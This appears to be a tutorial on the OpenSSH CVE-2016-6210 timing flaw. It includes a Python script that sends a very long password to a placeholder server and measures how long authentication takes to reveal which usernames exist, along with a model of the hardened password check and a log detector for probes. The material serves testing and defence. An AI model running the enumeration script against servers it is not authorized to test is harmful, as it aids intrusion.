Listing users via the CVE-2016-6210 vulnerability
When OpenSSH checks a user's password, it hashes the supplied password with a function such as SHA256 / SHA512 and compares the result against the user's stored password hash.
However, OpenSSH 7.2p2 and earlier had a vulnerability: it used Blowfish for users that don't exist and SHA256 / SHA512 for real users. The two hashes take different amounts of time to compute, so it is easy to tell a real username from a fake one by timing the response. This bug report gives some further details.
If SELinux is enabled, OpenSSH uses the helper binary "unix_chkpwd", which mitigates this flaw.
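To make the design flaw concrete, here is an added example (not code from the post or from OpenSSH) that models a password check in Python. The "vulnerable" version takes a cheaper, different-algorithm path for unknown users, which is the timing leak the post describes; the "hardened" version always performs the same expensive hash against a dummy record when the user does not exist, and rejects oversized passwords before hashing. PBKDF2-SHA256 stands in for the crypt(3) SHA256/SHA512 schemes, the user database and the 1024-character cap are our own choices, and the counters exist only so the amount of work each path does can be checked.

```python
import hashlib
import hmac
import os

# PBKDF2-SHA256 stands in for the crypt(3) SHA256/SHA512 password schemes.
ITERATIONS = 20_000
MAX_PASSWORD_LEN = 1024  # our own cap on password length (assumption, not OpenSSH's code)


def derive(password: str, salt: bytes) -> bytes:
    """The expensive hash a real user's password goes through."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str):
    salt = os.urandom(16)
    return salt, derive(password, salt)


# Constructed sample user database: username -> (salt, derived key).
USERS = {"realuser": make_user("correct horse")}

# Dummy record hashed with the same algorithm and cost. Unknown users are
# checked against it so the server does the same work either way.
DUMMY_SALT, DUMMY_KEY = make_user("placeholder-not-a-real-password")

# Counts how many expensive hashes each check performs (for demonstration only).
work = {"slow_hash_calls": 0}


def vulnerable_check(user: str, password: str) -> bool:
    """Models the flaw: nonexistent users take a cheaper, different path."""
    if user not in USERS:
        # A different algorithm with a different cost: no expensive hash at all,
        # so the response time reveals that the user does not exist.
        hashlib.sha1(password.encode()).digest()
        return False
    salt, key = USERS[user]
    work["slow_hash_calls"] += 1
    return hmac.compare_digest(derive(password, salt), key)


def hardened_check(user: str, password: str) -> bool:
    """Same work whether or not the user exists; oversized passwords rejected up front."""
    if len(password) > MAX_PASSWORD_LEN:
        return False
    salt, key = USERS.get(user, (DUMMY_SALT, DUMMY_KEY))
    work["slow_hash_calls"] += 1
    candidate = derive(password, salt)
    # Constant-time comparison, then deny unknown users regardless of the outcome
    # (a guess that happens to match the dummy record must never log in).
    matched = hmac.compare_digest(candidate, key)
    return matched and user in USERS


def slow_hash_calls(check, user: str, password: str) -> int:
    """Return how many expensive hash computations `check` performed for one attempt."""
    before = work["slow_hash_calls"]
    check(user, password)
    return work["slow_hash_calls"] - before


if __name__ == "__main__":
    for check in (vulnerable_check, hardened_check):
        print(check.__name__,
              "real user:", slow_hash_calls(check, "realuser", "wrong"),
              "fake user:", slow_hash_calls(check, "nothere", "wrong"))
```

The point of the hardened variant is not that the timings are identical to the nanosecond, but that the observable work no longer depends on whether the username exists. The length cap removes the second ingredient of the post's test, the 25000-character password that makes the slow path slow enough to measure across a network.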
Test Script
Here is a Python script from this article. Setting <SET SERVER HERE> to whatever server we want to test, we can see if the server is vulnerable:
import paramiko
import time

# Python 3 has no raw_input(); fall back to input() when it is missing.
try:
    read_line = raw_input
except NameError:
    read_line = input

user = read_line("user: ")
# A very long password makes the server-side hashing slow enough to time.
p = 'A' * 25000

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

starttime = time.time()
try:
    ssh.connect('<SET SERVER HERE>', username=user, password=p)
except Exception:
    # Authentication is expected to fail; what matters is how long it took.
    endtime = time.time()
    total = endtime - starttime
    print(total)
Testing it
So, first let's test a remote server of mine that I set up just for this. I change the above ‘
Let's test a real user (you can also use root as the user, if it's enabled):
user: realuser
12.5089271069
Then let’s test a fake one:
user: iambatman
2.69300603867
As you can see, 12.5 is greater than 2.6, so yes, the server is vulnerable.
The same test can also be run against the local system.
Fake user:
nothere
0.0369758605957
Real user:
MrReal
0.0134921073914
As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.
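From the defender's side, the probing shown above leaves a recognisable trace in sshd's syslog output: each fake username produces an "Invalid user ... from ..." line and each real one a "Failed password for ... from ..." line. The following is an added example (not from the post) of a small detector that parses such lines and flags any source that tries many distinct usernames within a short window. The log lines are constructed in the standard sshd format with documentation IP addresses; the window and threshold are arbitrary choices for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in sshd's syslog format (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    "Jul 20 10:00:01 bastion sshd[2001]: Invalid user iambatman from 203.0.113.5 port 40001",
    "Jul 20 10:00:01 bastion sshd[2001]: Failed password for invalid user iambatman from 203.0.113.5 port 40001 ssh2",
    "Jul 20 10:00:04 bastion sshd[2002]: Invalid user nothere from 203.0.113.5 port 40002",
    "Jul 20 10:00:07 bastion sshd[2003]: Invalid user admin from 203.0.113.5 port 40003",
    "Jul 20 10:00:10 bastion sshd[2004]: Failed password for realuser from 203.0.113.5 port 40004 ssh2",
    "Jul 20 10:00:13 bastion sshd[2005]: Invalid user test from 203.0.113.5 port 40005",
    "Jul 20 10:05:00 bastion sshd[2010]: Failed password for alice from 198.51.100.7 port 50001 ssh2",
    "Jul 20 10:05:30 bastion sshd[2011]: Accepted password for alice from 198.51.100.7 port 50001 ssh2",
]

# Matches the two messages a password probe produces: unknown usernames log
# "Invalid user", real ones (and repeats for unknown ones) log "Failed password for".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Invalid user (?P<bad>\S+) from (?P<src1>\S+)"
    r"|Failed password for (?:invalid user )?(?P<any>\S+) from (?P<src2>\S+))"
)

LOG_YEAR = 2016  # syslog timestamps carry no year; assumed for the sample


def parse_line(line):
    """Return (timestamp, source_ip, username), or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    user = m.group("bad") or m.group("any")
    src = m.group("src1") or m.group("src2")
    return ts, src, user


def find_enumeration(lines, window=timedelta(seconds=60), min_users=5):
    """Return {source_ip: sorted usernames} for sources that tried at least
    `min_users` distinct usernames inside any `window`-long span."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort()
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))

    flagged = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            users = {u for _, u in evs[start:end + 1]}
            if len(users) >= min_users:
                flagged[src] = sorted(users)
                break
    return flagged


if __name__ == "__main__":
    for src, users in find_enumeration(SAMPLE_LOG).items():
        print(f"{src}: {len(users)} usernames probed: {', '.join(users)}")
```

The detector sees probe volume, not the timing side channel itself, so it catches the quick sweep shown above but not a slow, spread-out probe; tightening the threshold or lengthening the window trades that blind spot against false positives from ordinary typos. The real fix remains upgrading sshd (or running with the unix_chkpwd helper the post mentions) so there is no timing difference to measure.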